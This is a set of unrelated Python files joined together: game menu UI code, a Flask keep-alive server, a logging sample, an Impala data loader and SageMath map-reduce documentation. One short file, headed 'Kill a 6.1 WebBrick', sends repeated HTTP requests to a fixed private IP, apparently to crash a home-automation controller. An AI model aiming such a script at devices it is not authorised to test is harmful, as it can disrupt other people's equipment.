self._save_state()
ba.containerwidget(edit=self._root_widget, transition='out_left')
assert self._store_button is not None
ba.app.ui.set_main_menu_window(
StoreBrowserWindow(
origin_widget=self._store_button.get_button(),
show_tab=show_tab,
back_location='CoopBrowserWindow').get_root_widget())
def _show_leader(self, tournament_button: dict[str, Any]) -> None:
# pylint: disable=cyclic-import
from bastd.ui.account.viewer import AccountViewerWindow
tournament_id = tournament_button['tournament_id']
# FIXME: This assumes a single player entry in leader; should expand
# this to work with multiple.
if tournament_id is None or tournament_button['leader'] is None or len(
tournament_button['leader'][2]) != 1:
ba.playsound(ba.getsound('error'))
return
ba.playsound(ba.getsound('swish'))
AccountViewerWindow(
account_id=tournament_button['leader'][2][0].get('a', None),
profile_id=tournament_button['leader'][2][0].get('p', None),
position=tournament_button['current_leader_name_text'].
get_screen_space_center())
def _show_scores(self, tournament_button: dict[str, Any]) -> None:
# pylint: disable=cyclic-import
from bastd.ui.tournamentscores import TournamentScoresWindow
tournament_id = tournament_button['tournament_id']
if tournament_id is None:
ba.playsound(ba.getsound('error'))
return
TournamentScoresWindow(
tournament_id=tournament_id,
position=tournament_button['more_scores_button'].
get_screen_space_center())
def is_tourney_data_up_to_date(self) -> bool:
"""Return whether our tourney data is up to date."""
return self._tourney_data_up_to_date
def run(self,
game: Optional[str],
tournament_button: dict[str, Any] = None) -> None:
"""Run the provided game."""
# pylint: disable=too-many-branches
# pylint: disable=too-many-statements
# pylint: disable=too-many-return-statements
# pylint: disable=cyclic-import
from bastd.ui.confirm import ConfirmWindow
from bastd.ui.tournamententry import TournamentEntryWindow
from bastd.ui.purchase import PurchaseWindow
from bastd.ui.account import show_sign_in_prompt
args: dict[str, Any] = {}
# Do a bit of pre-flight for tournament options.
if tournament_button is not None:
if _ba.get_account_state() != 'signed_in':
show_sign_in_prompt()
return
if not self._tourney_data_up_to_date:
ba.screenmessage(
ba.Lstr(resource='tournamentCheckingStateText'),
color=(1, 1, 0))
ba.playsound(ba.getsound('error'))
return
if tournament_button['tournament_id'] is None:
ba.screenmessage(
ba.Lstr(resource='internal.unavailableNoConnectionText'),
color=(1, 0, 0))
ba.playsound(ba.getsound('error'))
return
if tournament_button['required_league'] is not None:
ba.screenmessage(ba.Lstr(
resource='league.tournamentLeagueText',
subs=[
('${NAME}',
ba.Lstr(
translate=('leagueNames',
tournament_button['required_league'])))
]),
color=(1, 0, 0))
ba.playsound(ba.getsound('error'))
return
if tournament_button['time_remaining'] <= 0:
ba.screenmessage(ba.Lstr(resource='tournamentEndedText'),
color=(1, 0, 0))
ba.playsound(ba.getsound('error'))
return
# Game is whatever the tournament tells us it is.
game = ba.app.accounts.tournament_info[
tournament_button['tournament_id']]['game']
if tournament_button is None and game == 'Easy:The Last Stand':
ConfirmWindow(ba.Lstr(resource='difficultyHardUnlockOnlyText',
fallback_resource='difficultyHardOnlyText'),
cancel_button=False,
width=460,
height=130)
return
# Infinite onslaught/runaround require pro; bring up a store link if
# need be.
if tournament_button is None and game in (
'Challenges:Infinite Runaround',
'Challenges:Infinite Onslaught'
) and not ba.app.accounts.have_pro():
if _ba.get_account_state() != 'signed_in':
show_sign_in_prompt()
else:
PurchaseWindow(items=['pro'])
return
required_purchase: Optional[str]
if game in ['Challenges:Meteor Shower']:
required_purchase = 'games.meteor_shower'
elif game in [
'Challenges:Target Practice', 'Challenges:Target Practice B'
]:
required_purchase = 'games.target_practice'
elif game in ['Challenges:Ninja Fight']:
required_purchase = 'games.ninja_fight'
elif game in ['Challenges:Pro Ninja Fight']:
required_purchase = 'games.ninja_fight'
elif game in [
'Challenges:Easter Egg Hunt', 'Challenges:Pro Easter Egg Hunt'
]:
required_purchase = 'games.easter_egg_hunt'
else:
required_purchase = None
if (tournament_button is None and required_purchase is not None
and not _ba.get_purchased(required_purchase)):
if _ba.get_account_state() != 'signed_in':
show_sign_in_prompt()
else:
PurchaseWindow(items=[required_purchase])
return
self._save_state()
# For tournaments, we pop up the entry window.
if tournament_button is not None:
TournamentEntryWindow(
tournament_id=tournament_button['tournament_id'],
position=tournament_button['button'].get_screen_space_center())
else:
# Otherwise just dive right in.
assert game is not None
if ba.app.launch_coop_game(game, args=args):
ba.containerwidget(edit=self._root_widget,
transition='out_left')
def _back(self) -> None:
# pylint: disable=cyclic-import
from bastd.ui.play import PlayWindow
# If something is selected, store it.
self._save_state()
ba.containerwidget(edit=self._root_widget,
transition=self._transition_out)
ba.app.ui.set_main_menu_window(
PlayWindow(transition='in_left').get_root_widget())
def _restore_state(self) -> None:
try:
sel_name = ba.app.ui.window_states.get(type(self),
{}).get('sel_name')
if sel_name == 'Back':
sel = self._back_button
elif sel_name == 'Scroll':
sel = self._scrollwidget
elif sel_name == 'PowerRanking':
sel = self._league_rank_button_widget
elif sel_name == 'Store':
sel = self._store_button_widget
else:
sel = self._scrollwidget
ba.containerwidget(edit=self._root_widget, selected_child=sel)
except Exception:
ba.print_exception(f'Error restoring state for {self}.')
def _save_state(self) -> None:
cfg = ba.app.config
try:
sel = self._root_widget.get_selected_child()
if sel == self._back_button:
sel_name = 'Back'
elif sel == self._store_button_widget:
sel_name = 'Store'
elif sel == self._league_rank_button_widget:
sel_name = 'PowerRanking'
elif sel == self._scrollwidget:
sel_name = 'Scroll'
else:
raise ValueError('unrecognized selection')
ba.app.ui.window_states[type(self)] = {'sel_name': sel_name}
except Exception:
ba.print_exception(f'Error saving state for {self}.')
cfg['Selected Coop Row'] = self._selected_row
cfg['Selected Coop Custom Level'] = self._selected_custom_level
cfg['Selected Coop Challenge Level'] = self._selected_challenge_level
cfg['Selected Coop Campaign Level'] = self._selected_campaign_level
cfg.commit()
def sel_change(self, row: str, game: str) -> None:
"""(internal)"""
if self._do_selection_callbacks:
if row == 'custom':
self._selected_custom_level = game
if row == 'challenges':
self._selected_challenge_level = game
elif row == 'campaign':
self._selected_campaign_level = game
|
keepalive.py | from flask import Flask
from threading import Thread
app = Flask('')
@app.route('/')
def main():
return "Your bot is alive!"
def run():
app.run(host="0.0.0.0", port=8080)
def keep_alive():
server = Thread(target=run)
server.start() |
simple_sample.py | import argparse
import logging
import multiprocessing as mp
import os
import time
from socket_logging import Server, ServerHandler, register_handler
MAX_BYTES = 100000
BATCH_SIZE = 2000
LOG_FILE = "data/log/socket.log"
TEST_ROUND = 500
WORKER_NUM = 5
def worker(text):
client_logger = logging.getLogger("client_logger")
formatter = logging.Formatter(
"%(asctime)s - %(name)s - %(filename)s- [%(levelname)s]: %(message)s"
)
register_handler(
client_logger, logging_level=logging.INFO, formatter=formatter, verbose=True
)
client_logger.setLevel(logging.INFO)
pid = os.getpid()
for i in range(TEST_ROUND):
client_logger.info(f"{i} {text} from {pid}")
time.sleep(0.01)
def sample_running(text):
procs = [
mp.get_context("spawn").Process(target=worker, args=(text,))
for _ in range(WORKER_NUM)
]
for proc in procs:
proc.start()
for proc in procs:
proc.join()
proc.terminate()
if __name__ == "__main__":
parser = argparse.ArgumentParser()
parser.add_argument("--text", default="client test")
args = parser.parse_args()
server_handler = ServerHandler(LOG_FILE, maxBytes=MAX_BYTES)
server_handler.setLevel(logging.INFO)
server = Server(server_handler, batch_size=BATCH_SIZE, verbose=True)
server.start()
sample_running(args.text)
server.stop()
|
WBGetValues.py | #
# Kill a 6.1 WebBrick
#
#
import httplib, threading
adrs = "10.100.100.100"
uri = "/values.inc"
def doConn(i):
print "Starting WebBrick Connection %d" % i
conn = httplib.HTTPConnection(adrs)
print "Sending try"
conn.request("GET",uri)
res = conn.getresponse()
print "Try %d gave %d %s" % (i,res.status,res.reason)
def main():
tasks = {}
for i in range(0,10):
tasks[i] = threading.Thread(target=doConn(i))
for i in range(0,10):
tasks[i].start()
if __name__ == '__main__':
main()
|
load-data.py | #!/usr/bin/env python
# Copyright (c) 2012 Cloudera, Inc. All rights reserved.
#
# This script is used to load the proper datasets for the specified workloads. It loads
# all data via Hive except for parquet data which needs to be loaded via Impala.
# Most ddl commands are executed by Impala.
import collections
import os
import re
import sqlparse
import subprocess
import sys
import tempfile
import time
from itertools import product
from optparse import OptionParser
from Queue import Queue
from tests.beeswax.impala_beeswax import *
from threading import Thread
parser = OptionParser()
parser.add_option("-e", "--exploration_strategy", dest="exploration_strategy",
default="core",
help="The exploration strategy for schema gen: 'core', "\
"'pairwise', or 'exhaustive'")
parser.add_option("--hive_warehouse_dir", dest="hive_warehouse_dir",
default="/test-warehouse",
help="The HDFS path to the base Hive test warehouse directory")
parser.add_option("-w", "--workloads", dest="workloads",
help="Comma-separated list of workloads to load data for. If 'all' is "\
"specified then data for all workloads is loaded.")
parser.add_option("-s", "--scale_factor", dest="scale_factor", default="",
help="An optional scale factor to generate the schema for")
parser.add_option("-f", "--force_reload", dest="force_reload", action="store_true",
default=False, help='Skips HDFS exists check and reloads all tables')
parser.add_option("--impalad", dest="impalad", default="localhost:21000",
help="Impala daemon to connect to")
parser.add_option("--hive_hs2_hostport", dest="hive_hs2_hostport",
default="localhost:11050",
help="HS2 host:Port to issue Hive queries against using beeline")
parser.add_option("--table_names", dest="table_names", default=None,
help="Only load the specified tables - specified as a comma-seperated "\
"list of base table names")
parser.add_option("--table_formats", dest="table_formats", default=None,
help="Override the test vectors and load using the specified table "\
"formats. Ex. --table_formats=seq/snap/block,text/none")
parser.add_option("--hdfs_namenode", dest="hdfs_namenode", default="localhost:20500",
help="HDFS name node for Avro schema URLs, default localhost:20500")
parser.add_option("--workload_dir", dest="workload_dir",
default=os.environ['IMPALA_WORKLOAD_DIR'],
help="Directory that contains Impala workloads")
parser.add_option("--dataset_dir", dest="dataset_dir",
default=os.environ['IMPALA_DATASET_DIR'],
help="Directory that contains Impala datasets")
parser.add_option("--use_kerberos", action="store_true", default=False,
help="Load data on a kerberized cluster.")
options, args = parser.parse_args()
DATA_LOAD_DIR = '/tmp/data-load-files'
WORKLOAD_DIR = options.workload_dir
DATASET_DIR = options.dataset_dir
TESTDATA_BIN_DIR = os.path.join(os.environ['IMPALA_HOME'], 'testdata/bin')
AVRO_SCHEMA_DIR = "avro_schemas"
GENERATE_SCHEMA_CMD = "generate-schema-statements.py --exploration_strategy=%s "\
"--workload=%s --scale_factor=%s --verbose"
# Load data using Hive's beeline because the Hive shell has regressed (CDH-17222).
# The Hive shell is stateful, meaning that certain series of actions lead to problems.
# Examples of problems due to the statefullness of the Hive shell:
# - Creating an HBase table changes the replication factor to 1 for subsequent LOADs.
# - INSERTs into an HBase table fail if they are the first stmt executed in a session.
# However, beeline itself also has bugs. For example, inserting a NULL literal into
# a string-typed column leads to an NPE. We work around these problems by using LOAD from
# a datafile instead of doing INSERTs.
# TODO: Adjust connection string for --use_kerberos=true appropriately.
HIVE_CMD = os.path.join(os.environ['HIVE_HOME'], 'bin/beeline')
HIVE_ARGS = '-u "jdbc:hive2://%s/default;auth=noSasl" --verbose=true'\
% (options.hive_hs2_hostport)
HADOOP_CMD = os.path.join(os.environ['HADOOP_HOME'], 'bin/hadoop')
def available_workloads(workload_dir):
return [subdir for subdir in os.listdir(workload_dir)
if os.path.isdir(os.path.join(workload_dir, subdir))]
def validate_workloads(all_workloads, workloads):
for workload in workloads:
if workload not in all_workloads:
print 'Workload \'%s\' not found in workload directory' % workload
print 'Available workloads: ' + ', '.join(all_workloads)
sys.exit(1)
def exec_cmd(cmd, error_msg, exit_on_error=True):
ret_val = -1
try:
ret_val = subprocess.call(cmd, shell=True)
except Exception as e:
error_msg = "%s: %s" % (error_msg, str(e))
finally:
if ret_val != 0:
print error_msg
if exit_on_error: sys.exit(ret_val)
return ret_val
def exec_hive_query_from_file(file_name):
if not os.path.exists(file_name): return
hive_cmd = "%s %s -f %s" % (HIVE_CMD, HIVE_ARGS, file_name)
print 'Executing Hive Command: %s' % hive_cmd
exec_cmd(hive_cmd, 'Error executing file from Hive: ' + file_name)
def exec_hbase_query_from_file(file_name):
if not os.path.exists(file_name): return
hbase_cmd = "hbase shell %s" % file_name
print 'Executing HBase Command: %s' % hbase_cmd
exec_cmd(hbase_cmd, 'Error executing hbase create commands')
def exec_impala_query_from_file(file_name):
"""Execute each query in an Impala query file individually"""
is_success = True
impala_client = ImpalaBeeswaxClient(options.impalad, use_kerberos=options.use_kerberos)
try:
impala_client.connect()
with open(file_name, 'r+') as query_file:
queries = sqlparse.split(query_file.read())
for query in queries:
query = sqlparse.format(query.rstrip(';'), strip_comments=True)
print '(%s):\n%s\n' % (file_name, query.strip())
result = impala_client.execute(query)
except Exception as e:
print "Data Loading from Impala failed with error: %s" % str(e)
is_success = False
finally:
impala_client.close_connection()
return is_success
def exec_bash_script(file_name):
bash_cmd = "bash %s" % file_name
print 'Executing Bash Command: ' + bash_cmd
exec_cmd(bash_cmd, 'Error bash script: ' + file_name)
def generate_schema_statements(workload):
generate_cmd = GENERATE_SCHEMA_CMD % (options.exploration_strategy, workload,
options.scale_factor)
if options.table_names:
generate_cmd += " --table_names=%s" % options.table_names
if options.force_reload:
generate_cmd += " --force_reload"
if options.table_formats:
generate_cmd += " --table_formats=%s" % options.table_formats
if options.hive_warehouse_dir is not None:
generate_cmd += " --hive_warehouse_dir=%s" % options.hive_warehouse_dir
if options.hdfs_namenode is not None:
generate_cmd += " --hdfs_namenode=%s" % options.hdfs_namenode
print 'Executing Generate Schema Command: ' + generate_cmd
schema_cmd = os.path.join(TESTDATA_BIN_DIR, generate_cmd)
error_msg = 'Error generating schema statements for workload: ' + workload
exec_cmd(schema_cmd, error_msg)
def get_dataset_for_workload(workload):
dimension_file_name = os.path.join(WORKLOAD_DIR, workload,
'%s_dimensions.csv' % workload)
if not os.path.isfile(dimension_file_name):
print 'Dimension file not found: ' + dimension_file_name
sys.exit(1)
with open(dimension_file_name, 'rb') as input_file:
match = re.search('dataset:\s*([\w\-\.]+)', input_file.read())
if match:
return match.group(1)
else:
print 'Dimension file does not contain dataset for workload \'%s\'' % (workload)
sys.exit(1)
def copy_avro_schemas_to_hdfs(schemas_dir):
"""Recursively copies all of schemas_dir to the test warehouse."""
if not os.path.exists(schemas_dir):
print 'Avro schema dir (%s) does not exist. Skipping copy to HDFS.' % schemas_dir
return
exec_hadoop_fs_cmd("-mkdir -p " + options.hive_warehouse_dir)
exec_hadoop_fs_cmd("-put -f %s %s/" % (schemas_dir, options.hive_warehouse_dir))
def exec_hadoop_fs_cmd(args, exit_on_error=True):
cmd = "%s fs %s" % (HADOOP_CMD, args)
print "Executing Hadoop command: " + cmd
exec_cmd(cmd, "Error executing Hadoop command, exiting",
exit_on_error=exit_on_error)
def exec_impala_query_from_file_parallel(query_files):
# Get the name of the query file that loads the base tables, if it exists.
# TODO: Find a better way to detect the file that loads the base tables.
create_base_table_file = next((q for q in query_files if 'text' in q), None)
if create_base_table_file:
is_success = exec_impala_query_from_file(create_base_table_file)
query_files.remove(create_base_table_file)
# If loading the base tables failed, exit with a non zero error code.
if not is_success: sys.exit(1)
if not query_files: return
threads = []
result_queue = Queue()
for query_file in query_files:
thread = Thread(target=lambda x: result_queue.put(exec_impala_query_from_file(x)),
args=[query_file])
thread.daemon = True
threads.append(thread)
thread.start()
# Keep looping until the number of results retrieved is the same as the number of
# threads spawned, or until a data loading query fails. result_queue.get() will
# block until a result is available in the queue.
num_fetched_results = 0
while num_fetched_results < len(threads):
success = result_queue.get()
num_fetched_results += 1
if not success: sys.exit(1)
# There is a small window where a thread may still be alive even if all the threads have
# finished putting their results in the queue.
for thread in threads: thread.join()
def invalidate_impala_metadata():
print "Invalidating Metadata"
impala_client = ImpalaBeeswaxClient(options.impalad, use_kerberos=options.use_kerberos)
impala_client.connect()
try:
impala_client.execute('invalidate metadata')
finally:
impala_client.close_connection()
if __name__ == "__main__":
all_workloads = available_workloads(WORKLOAD_DIR)
workloads = []
if options.workloads is None:
print "At least one workload name must be specified."
parser.print_help()
sys.exit(1)
elif options.workloads == 'all':
print 'Loading data for all workloads.'
workloads = all_workloads
else:
workloads = options.workloads.split(",")
validate_workloads(all_workloads, workloads)
print 'Starting data load for the following workloads: ' + ', '.join(workloads)
loading_time_map = collections.defaultdict(float)
for workload in workloads:
start_time = time.time()
dataset = get_dataset_for_workload(workload)
generate_schema_statements(workload)
assert os.path.isdir(os.path.join(DATA_LOAD_DIR, dataset)), ("Data loading files "
"do not exist for (%s)" % dataset)
os.chdir(os.path.join(DATA_LOAD_DIR, dataset))
copy_avro_schemas_to_hdfs(AVRO_SCHEMA_DIR)
dataset_dir_contents = os.listdir(os.getcwd())
load_file_substr = "%s-%s" % (workload, options.exploration_strategy)
# Data loading with Impala is done in parallel, each file format has a separate query
# file.
create_filename = '%s-impala-generated' % load_file_substr
load_filename = '%s-impala-load-generated' % load_file_substr
impala_create_files = [f for f in dataset_dir_contents if create_filename in f]
impala_load_files = [f for f in dataset_dir_contents if load_filename in f]
# Execute the data loading scripts.
# Creating tables in Impala has no dependencies, so we execute them first.
# HBase table inserts are done via hive, so the hbase tables need to be created before
# running the hive script. Some of the Impala inserts depend on hive tables,
# so they're done at the end. Finally, the Hbase Tables that have been filled with data
# need to be flushed.
exec_impala_query_from_file_parallel(impala_create_files)
exec_hbase_query_from_file('load-%s-hbase-generated.create' % load_file_substr)
exec_hive_query_from_file('load-%s-hive-generated.sql' % load_file_substr)
exec_hbase_query_from_file('post-load-%s-hbase-generated.sql' % load_file_substr)
if impala_load_files: invalidate_impala_metadata()
exec_impala_query_from_file_parallel(impala_load_files)
loading_time_map[workload] = time.time() - start_time
invalidate_impala_metadata()
total_time = 0.0
for workload, load_time in loading_time_map.iteritems():
total_time += load_time
print 'Data loading for workload \'%s\' completed in: %.2fs'\
% (workload, load_time)
print 'Total load time: %.2fs\n' % total_time
|
map_reduce.py | r"""
Parallel computations using RecursivelyEnumeratedSet and Map-Reduce
There is an efficient way to distribute computations on a set
`S` of objects defined by :func:`RecursivelyEnumeratedSet`
(see :mod:`sage.sets.recursively_enumerated_set` for more details)
over which one would like to perform the following kind of operations:
* Compute the cardinality of a (very large) set defined recursively
(through a call to :class:`RecursivelyEnumeratedSet_forest`)
* More generally, compute any kind of generating series over this set
* Test a conjecture, e.g. find an element of `S` satisfying a specific
property, or check that none does or that they all do
* Count/list the elements of `S` that have a specific property
* Apply any map/reduce kind of operation over the elements of `S`
AUTHORS:
- Florent Hivert -- code, documentation (2012--2016)
- Jean Baptiste Priez -- prototype, debugging help on MacOSX (2011-June, 2016)
- Nathann Cohen -- some documentation (2012)
Contents
--------
- :ref:`basic-usage`
- :ref:`advanced-use`
- :ref:`profiling`
- :ref:`logging`
- :ref:`protocol-description`
- :ref:`examples`
How is this different from usual MapReduce ?
--------------------------------------------
This implementation is specific to :class:`RecursivelyEnumeratedSet_forest`, and uses its
properties to do its job. Not only mapping and reducing but also
**generating the elements** of `S` is done on different processors.
.. _basic-usage:
How can I use all that stuff?
-----------------------------
First, you need to set the environment variable `SAGE_NUM_THREADS` to the
desired number of parallel threads to be used:
sage: import os # not tested
sage: os.environ["SAGE_NUM_THREADS"] = '8' # not tested
Second, you need the information necessary to describe a
:class:`RecursivelyEnumeratedSet_forest` representing your set `S` (see
:mod:`sage.sets.recursively_enumerated_set`). Then, you need to provide a
"map" function as well as a "reduce" function. Here are some examples:
* **Counting the number of elements.** In this situation, the map function
can be set to ``lambda x: 1``, and the reduce function just adds the
values together, i.e. ``lambda x, y: x + y``.
We count binary words of length `\leq 16`::
sage: seeds = [[]]
sage: succ = lambda l: [l + [0], l + [1]] if len(l) < 16 else []
sage: S = RecursivelyEnumeratedSet(seeds, succ,
....: structure='forest', enumeration='depth')
sage: map_function = lambda x: 1
sage: reduce_function = lambda x, y: x + y
sage: reduce_init = 0
sage: S.map_reduce(map_function, reduce_function, reduce_init)
131071
This matches the number of binary words of length `\leq 16`::
sage: factor(131071 + 1)
2^17
Note that the map and reduce functions here have the default values of the
:meth:`sage.sets.recursively_enumerated_set.RecursivelyEnumeratedSet_forest.map_reduce` method
so that the number of elements can be obtained more simply with::
sage: S.map_reduce()
131071
Instead of using :func:`RecursivelyEnumeratedSet`, one can directly use
:class:`RESetMapReduce`, which gives finer
control over the parallel execution (see :ref:`advanced-use` below)::
sage: from sage.parallel.map_reduce import RESetMapReduce
sage: S = RESetMapReduce(
....: roots=[[]],
....: children=lambda l: [l + [0], l + [1]] if len(l) < 16 else [],
....: map_function=lambda x: 1,
....: reduce_function=lambda x, y: x + y,
....: reduce_init=0)
sage: S.run()
131071
* **Generating series.** For this, take a Map function that associates a
monomial to each element of `S`, while the Reduce function is still equal to
``lambda x, y: x + y``.
We compute the generating series for counting binary words of each
length `\leq 16`::
sage: S = RecursivelyEnumeratedSet(
....: [[]], lambda l: [l + [0], l + [1]] if len(l) < 16 else [],
....: structure='forest', enumeration='depth')
sage: x = polygen(ZZ)
sage: sp = S.map_reduce(
....: map_function=lambda z: x**len(z),
....: reduce_function=lambda x, y: x + y,
....: reduce_init=0)
sage: sp
65536*x^16 + 32768*x^15 + 16384*x^14 + 8192*x^13 + 4096*x^12
+ 2048*x^11 + 1024*x^10 + 512*x^9 + 256*x^8 + 128*x^7 + 64*x^6
+ 32*x^5 + 16*x^4 + 8*x^3 + 4*x^2 + 2*x + 1
This is of course `\sum_{i=0}^{16} (2x)^i`::
sage: sp == sum((2*x)^i for i in range(17))
True
Here is another example where we count permutations of size `\leq 8` (here
we use the default values)::
sage: S = RecursivelyEnumeratedSet(
....: [[]],
....: lambda l: ([l[:i] + [len(l)] + l[i:]
....: for i in range(len(l) + 1)] if len(l) < 8 else []),
....: structure='forest',
....: enumeration='depth')
sage: x = polygen(ZZ)
sage: sp = S.map_reduce(lambda z: x**len(z)); sp
40320*x^8 + 5040*x^7 + 720*x^6 + 120*x^5 + 24*x^4 + 6*x^3 + 2*x^2 + x + 1
This is of course `\sum_{i=0}^{8} i! x^i`::
sage: sp == sum(factorial(i)*x^i for i in range(9))
True
* **Post Processing.** We now demonstrate the use of ``post_process``. We
generate the permutation as previously, but we only perform the map/reduce
computation on those of even ``len``. Of course we get the even part of the
previous generating series::
sage: S = RecursivelyEnumeratedSet(
....: [[]],
....: lambda l: ([l[:i] + [len(l) + 1] + l[i:]
....: for i in range(len(l) + 1)] if len(l) < 8 else []),
....: post_process=lambda l: l if len(l) % 2 == 0 else None,
....: structure='forest',
....: enumeration='depth')
sage: sp = S.map_reduce(lambda z: x**len(z)); sp
40320*x^8 + 720*x^6 + 24*x^4 + 2*x^2 + 1
This is also useful for example to call a constructor on the generated
elements::
sage: S = RecursivelyEnumeratedSet(
....: [[]],
....: lambda l: ([l[:i] + [len(l) + 1] + l[i:]
....: for i in range(len(l) + 1)] if len(l) < 5 else []),
....: post_process=lambda l: Permutation(l) if len(l) == 5 else None,
....: structure='forest',
....: enumeration='depth')
sage: x = polygen(ZZ)
sage: sp = S.map_reduce(lambda z: x**z.number_of_inversions()); sp
x^10 + 4*x^9 + 9*x^8 + 15*x^7 + 20*x^6 + 22*x^5 + 20*x^4 + 15*x^3 + 9*x^2 + 4*x + 1
We get here a polynomial which is the `q`-factorial (in the variable `x`) of `5`,
that is, `\prod_{i=1}^{5} \frac{1-x^i}{1-x}`::
sage: x = polygen(ZZ)
sage: prod((1-x^i)//(1-x) for i in range(1, 6))
x^10 + 4*x^9 + 9*x^8 + 15*x^7 + 20*x^6 + 22*x^5 + 20*x^4 + 15*x^3 + 9*x^2 + 4*x + 1
Compare::
sage: from sage.combinat.q_analogues import q_factorial
sage: q_factorial(5)
q^10 + 4*q^9 + 9*q^8 + 15*q^7 + 20*q^6 + 22*q^5 + 20*q^4 + 15*q^3 + 9*q^2 + 4*q + 1
* **Listing the objects.** One can also compute the list of objects in a
:class:`RecursivelyEnumeratedSet_forest>`
using :class:`RESetMapReduce`. As an example, we compute the set of numbers
between 1 and 63, generated by their binary expansion::
sage: S = RecursivelyEnumeratedSet(
....: [1],
....: lambda l: [(l<<1)|0, (l<<1)|1] if l < 1<<5 else [],
....: structure='forest',
....: enumeration='depth')
Here is the list computed without :class:`RESetMapReduce`::
sage: serial = list(S)
sage: serial
[1, 2, 4, 8, 16, 32, 33, 17, 34, 35, 9, 18, 36, 37, 19, 38, 39, 5, 10,
20, 40, 41, 21, 42, 43, 11, 22, 44, 45, 23, 46, 47, 3, 6, 12, 24, 48,
49, 25, 50, 51, 13, 26, 52, 53, 27, 54, 55, 7, 14, 28, 56, 57, 29, 58,
59, 15, 30, 60, 61, 31, 62, 63]
Here is how to perform the parallel computation. The order of the lists
depends on the synchronisation of the various computation processes and
therefore should be considered as random::
sage: parall = S.map_reduce(lambda x: [x], lambda x, y: x + y, [])
sage: parall # random
[1, 3, 7, 15, 31, 63, 62, 30, 61, 60, 14, 29, 59, 58, 28, 57, 56, 6, 13,
27, 55, 54, 26, 53, 52, 12, 25, 51, 50, 24, 49, 48, 2, 5, 11, 23, 47,
46, 22, 45, 44, 10, 21, 43, 42, 20, 41, 40, 4, 9, 19, 39, 38, 18, 37,
36, 8, 17, 35, 34, 16, 33, 32]
sage: sorted(serial) == sorted(parall)
True
.. _advanced-use:
Advanced use
------------
Fine control over the execution of a map/reduce computation is achieved
via parameters passed to the :meth:`RESetMapReduce.run` method.
The following three parameters can be used:
- ``max_proc`` -- (integer, default: ``None``) if given, the
maximum number of worker processors to use. The actual number
is also bounded by the value of the environment variable
``SAGE_NUM_THREADS`` (the number of cores by default).
- ``timeout`` -- a timeout on the computation (default: ``None``)
- ``reduce_locally`` -- whether the workers should reduce locally
their work or sends results to the master as soon as possible.
See :class:`RESetMapReduceWorker` for details.
Here is an example or how to deal with timeout::
sage: from sage.parallel.map_reduce import (RESetMPExample, AbortError)
sage: EX = RESetMPExample(maxl=100)
sage: try:
....: res = EX.run(timeout=0.01)
....: except AbortError:
....: print("Computation timeout")
....: else:
....: print("Computation normally finished")
....: res
Computation timeout
The following should not timeout even on a very slow machine::
sage: EX = RESetMPExample(maxl=8)
sage: try:
....: res = EX.run(timeout=60)
....: except AbortError:
....: print("Computation Timeout")
....: else:
....: print("Computation normally finished")
....: res
Computation normally finished
40320*x^8 + 5040*x^7 + 720*x^6 + 120*x^5 + 24*x^4 + 6*x^3 + 2*x^2 + x + 1
As for ``reduce_locally``, one should not see any difference, except for speed
during normal usage. Most of the time one should leave it set to ``True``,
unless one sets up a mechanism to consume the partial results as soon as they
arrive. See :class:`RESetParallelIterator` and in particular the ``__iter__``
method for a example of consumer use.
.. _profiling:
Profiling
---------
It is possible to profile a map/reduce computation. First we create a
:class:`RESetMapReduce` object::
sage: from sage.parallel.map_reduce import RESetMapReduce
sage: S = RESetMapReduce(
....: roots=[[]],
....: children=lambda l: [l + [0], l + [1]] if len(l) < 16 else [],
....: map_function=lambda x: 1,
....: reduce_function=lambda x, y: x + y,
....: reduce_init=0)
The profiling is activated by the ``profile`` parameter. The value provided
should be a prefix (including a possible directory) for the profile dump::
sage: prof = tmp_dir('RESetMR_profile') + 'profcomp'
sage: res = S.run(profile=prof) # random
[RESetMapReduceWorker-1:58] (20:00:41.444) Profiling in
/home/user/.sage/temp/.../32414/RESetMR_profilewRCRAx/profcomp1
...
[RESetMapReduceWorker-1:57] (20:00:41.444) Profiling in
/home/user/.sage/temp/.../32414/RESetMR_profilewRCRAx/profcomp0
...
sage: res
131071
In this example, the profiles have been dumped in files such as
``profcomp0``. One can then load and print them as follows. See
:class:`cProfile.Profile` for more details::
sage: import cProfile, pstats
sage: st = pstats.Stats(prof+'0')
sage: st.strip_dirs().sort_stats('cumulative').print_stats() # random
...
Ordered by: cumulative time
ncalls tottime percall cumtime percall filename:lineno(function)
1 0.023 0.023 0.432 0.432 map_reduce.py:1211(run_myself)
11968 0.151 0.000 0.223 0.000 map_reduce.py:1292(walk_branch_locally)
...
<pstats.Stats instance at 0x7fedea40c6c8>
.. SEEALSO::
`The Python Profilers <https://docs.python.org/2/library/profile.html>`_
for more detail on profiling in python.
.. _logging:
Logging
-------
The computation progress is logged through a :class:`logging.Logger` in
``sage.parallel.map_reduce.logger`` together with :class:`logging.StreamHandler`
and a :class:`logging.Formatter`. They are currently configured to print
warning messages to the console.
.. SEEALSO::
`Logging facility for Python <https://docs.python.org/2/library/logging.html>`_
for more detail on logging and log system configuration.
.. note::
Calls to logger which involve printing the node are commented out in the
code, because the printing (to a string) of the node can be very time
consuming depending on the node and it happens before the decision whether
the logger should record the string or drop it.
.. _protocol-description:
How does it work ?
------------------
The scheduling algorithm we use here is any adaptation of :wikipedia:`Work_stealing`:
In a work stealing scheduler, each processor in a computer system has a
queue of work items (computational tasks, threads) to perform. [...]. Each
work items are initially put on the queue of the processor executing the
work item. When a processor runs out of work, it looks at the queues of
other processors and "steals" their work items. In effect, work stealing
distributes the scheduling work over idle processors, and as long as all
processors have work to do, no scheduling overhead occurs.
For communication we use Python's basic :mod:`multiprocessing` module. We
first describe the different actors and communication tools used by the
system. The work is done under the coordination of a **master** object (an
instance of :class:`RESetMapReduce`) by a bunch of **worker** objects
(instances of :class:`RESetMapReduceWorker`).
Each running map reduce instance works on a :class:`RecursivelyEnumeratedSet_forest>` called here `C` and is
coordinated by a :class:`RESetMapReduce` object called the **master**. The
master is in charge of launching the work, gathering the results and cleaning
up at the end of the computation. It doesn't perform any computation
associated to the generation of the element `C` nor the computation of the
mapped function. It however occasionally perform a reduce, but most reducing
is by default done by the workers. Also thanks to the work-stealing algorithm,
the master is only involved in detecting the termination of the computation
but all the load balancing is done at the level of the workers.
Workers are instances of :class:`RESetMapReduceWorker`. They are responsible
for doing the actual computations: element generation, mapping and reducing.
They are also responsible for the load balancing thanks to work-stealing.
Here is a description of the attributes of the **master** relevant to the
map-reduce protocol:
- ``_results`` -- a :class:`~multiprocessing.queues.SimpleQueue` where
the master gathers the results sent by the workers.
- ``_active_tasks`` -- a :class:`~multiprocessing.Semaphore` recording
